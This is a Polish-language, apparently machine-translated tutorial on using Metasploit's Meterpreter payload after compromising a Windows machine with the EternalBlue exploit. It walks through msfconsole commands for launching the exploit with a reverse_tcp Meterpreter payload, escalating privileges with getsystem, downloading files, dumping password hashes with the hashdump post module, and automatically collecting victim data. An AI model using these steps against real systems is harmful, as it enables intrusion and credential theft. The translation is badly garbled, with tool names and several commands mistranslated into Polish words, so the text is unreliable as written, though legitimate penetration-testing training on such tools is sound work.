Po wykorzystaniu za pomocą Miernik

Po wykorzystaniu za pomocą Miernik
Jest to wprowadzenie do wtyczki ładunku MeterPreter w Metasploit. W tym krótkim samouczku omówimy, jak go używać do zastosowania eksploatacji po systemie systemu systemu Windows, gdy już go naruszyłeś za pomocą exploitu EternalBlue. Ograniczamy się dostęp do systemu Windows i jego badanie, a wszystkie rzeczy, które zamierzamy zrobić, skupiają się na dostępie do informacji i poświadczeń użytkowników.

Wprowadzenie do miernika

MeterPreter to ładunek ataku w ramie Metasploit, który pozwala sprawcielowi kontrolować i nawigować po komputerze ofiary za pośrednictwem powłoki poleceń. Może okazać się bardzo wszechstronnym narzędziem, jeśli chodzi o testowanie penetracji. Jest to narzędzie po eksploatacji, które jest oparte na wtrysku DLL w pamięci, co oznacza, że ​​wprowadza wtryskiwane DLL, utworzając nowy proces, który wymaga uruchomienia systemu do uruchomienia wtryskiwanego DLL. Może zapewnić dostęp do niewidzialnej powłoki poleceń na komputerze ofiar.

Został pierwotnie napisany dla Metasploit 2.x i jest zaktualizowany do metasploit 3.

Omówimy szczegółowo zastosowanie miernika, ale wcześniej powiedzmy ogólnie słowo o ładunku

Jakie są ładunki?

Ładunki w metasploit są modułami, co oznacza, że ​​są fragmenty kodów w Metasploit, które działają w systemie zdalnym, którym kierujemy. Moduł exploit jest wysyłany jako pierwszy, który instaluje moduł ładunku w systemie. Następnie ładowanie zapewnia dostęp do atakującego (ograniczony lub pełny, zależy od zawartości ładunku). Aby dalej rozwinąć funkcjonowanie ładunków, musimy omówić jego typy, które mają 3 w sumie:

Syngiel

Te ładunki są całkowicie samodzielne, co oznacza, że ​​mogą być tak podstawowe jak kody strażnika, które pozwalają użytkownikowi w system docelowy.

Stagers

Stagers to ładunki, które zbierają aplikacje w systemie docelowym i wysyłają je do atakującego. Ustanawia związek między ofiarą z naszą lokalną maszyną.

Gradacja

Gdy Stagers mają dostęp do systemu, pobierają moduły etapów. Etapy moduły usuwają czapkę rozmiaru na miernik.

Przykładami scen byłoby prostą powłokę, iPhone „ipwn”, moduły meterowe, wtrysk VNC.

Możesz wypracować rodzaj ładunku, zastanawiając się nad jego nazwą. Pojedyncze ładunki są zwykle w formacie /

Wykorzystanie za pomocą Miernik

Po pierwsze, uruchom konsolę MSF, wpisując następujące polecenie terminala w oknie terminalu Kali.

$ sudo msfconsole

Używamy odwrotnej_tcp jako stagera i miernika jako sceny.

Zaczniemy od skonfigurowania Eternal Blue Exploit. Wybierz (MS17_010_ETERNALBLUE), następnie ustaw Windows/x64/MeterPreter/reverse_tcp jako wybrany ładunek

Następnie skonfiguruj ustawienia exploit, a następnie uruchom polecenie exploit za pomocą polecenia exploit:

$ Ustaw ładunek Windows/x64/MeterPreter/reverse_tcp
$ set rhost 192.168.198.136
$ exploit

EternalBlue Exploit został aktywowany pomyślnie.

Wykorzystanie po wykorzystywaniu

Uzyskujemy dostęp i manipulujemy już upośledzonym systemem podczas eksploatacji.

Możemy zrobić wiele rzeczy teraz, kiedy mamy dostęp do systemu, ale jak wspomniano powyżej, mamy być skupieni głównie na pobieraniu informacji i uzyskiwaniu poświadczeń użytkownika tutaj

Zarządzanie przywilejem dostępu:

W zależności od modułu ładunku i wykorzystania, którego użyłeś, możesz mieć do czynienia z pewnymi ograniczeniami dostępu, które poważnie określi twoje umiejętności manewrowania maszyną ofiary. Możesz obejść ten problem z eskalacją przywilejów poprzez usunięcie haseł i manipulowanie rejestrami. Możesz także eskalować uprawnienia, używając systemu GET -COMMAND METERPRETER.

$ getSystem
$ getuid

Transfer pliku za pomocą miernika

Za pomocą MeterPreter możesz pobrać plik za pomocą komendy $ Download-.

$ pobierz/Windows/System32/Drivers/etc/hosts

Podobnie możesz również przesyłać informacje do komputera, używając $ przesyłaj- polecenie

Wyodrębnienie poświadczeń użytkownika:

Użyj skryptu kodu poświadczenie_collector, aby wyodrębnić informacje o kont użytkownika lub użyj modułu postu zrzutu skrótu do podobnego efektu.

Użyjemy modułu zrzutu skrótów, aby kontynuować zbiór poświadczeń. Wpisz następujące polecenie MSF.

$ uruchom post/Windows/Gather/Hashdump

Jak widzimy, uzyskaliśmy konta Coen, Guest i Administrant. Hash LM (admin) i ntlm (gościa) dotyczą pustych haseł, podczas gdy hash Coen to hasło, które musisz złamać. Możesz to zrobić za pomocą krakersa hasła.

Automatyzacja skrobania systemu

Nudne może być gromadzenie informacji z poszczególnymi instrukcjami wejściowymi, które musisz nadal karmić powłokę poleceń. Dogodnie możesz nieco zautomatyzować ten proces za pomocą skryptu winorośli. Skrypt zbiera informacje z ofiary i pobiera dane do naszej maszyny lokalnej. Zostaniesz powiedziany, gdzie jest zapisywane wyjście, jak widać w czwartej linii z góry:

$ run Wineum

Należy pamiętać, że ścieżka, na której przechowywane jest wyjście do każdego polecenia, może być inna od tej wyświetlanej tutaj.

Połączmy trochę więcej

Wykonanie plików

Możesz uruchomić dowolny plik w systemie, używając: Wykonaj -f . Obejmuje to zarówno pliki wykonywalne, jak i programy z wieloma plikami pomocniczymi. Na przykład, aby uruchomić wbudowaną aplikację kalkulatora w systemie systemu Windows, wpisz execute -f calc.exe

Robienie zrzutów ekranu

Możesz także przechwytywać zrzuty ekranu z punktu widzenia użytkownika. Po prostu wpisz zrzut ekranu w powładzie poleceń miernika, a otrzymasz zrzut ekranu wyświetlacza w systemie.

$ execute -f calc.exe
$ zrzut ekranu

Wniosek:

To było krótkie wprowadzenie do wtyczki MeterPreter w Framework Metasploit, a także krótki przewodnik, który pokazuje najbardziej podstawowe zastosowania. Nauczyliśmy się tutaj, w jaki sposób możemy naruszyć system systemu Windows OS z EternalBlue Exploit, aby uzyskać dostęp, a następnie użyć miernika do eskalacji uprawnień, gromadzenia informacji ręcznie i przez automatyczne polecenie winnicy. Nauczyliśmy się również wykonywać pliki na komputerze ofiary.

Miernik może służyć jako znaczny sposób wykrywania podatności, mimo że jest konglomeracją podstawowych narzędzi w ramach Metasploit.